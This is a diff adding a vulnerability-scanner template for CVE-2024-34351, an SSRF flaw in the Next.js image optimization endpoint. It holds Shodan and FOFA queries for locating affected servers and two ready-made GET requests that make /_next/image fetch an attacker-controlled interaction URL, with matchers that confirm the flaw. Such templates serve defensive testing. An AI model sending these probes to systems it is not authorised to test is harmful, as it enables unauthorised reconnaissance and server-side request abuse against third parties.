diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml new file mode 100644 index 0000000000..b0bc3df145 --- /dev/null +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -0,0 +1,49 @@ +id: CVE-2024-34351 + +info: + name: Next.js - Server Side Request Forgery (SSRF) + author: righettod + severity: high + description: | + Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF. + remediation: Upgrade to Next.js version 14.1.1 or higher. + reference: + - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps + - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 + - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + - https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085 + - https://github.com/vercel/next.js/pull/62561 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-34351 + cwe-id: CWE-918 + epss-score: 0.00062 + epss-percentile: 0.26843 + metadata: + max-request: 2 + product: next.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" + tags: cve,cve2024,vercel,nextjs,ssrf + +http: + - method: GET + path: + - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}' + - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - 'http' + + - type: word + part: body + words: + - "The requested resource isn't a valid image"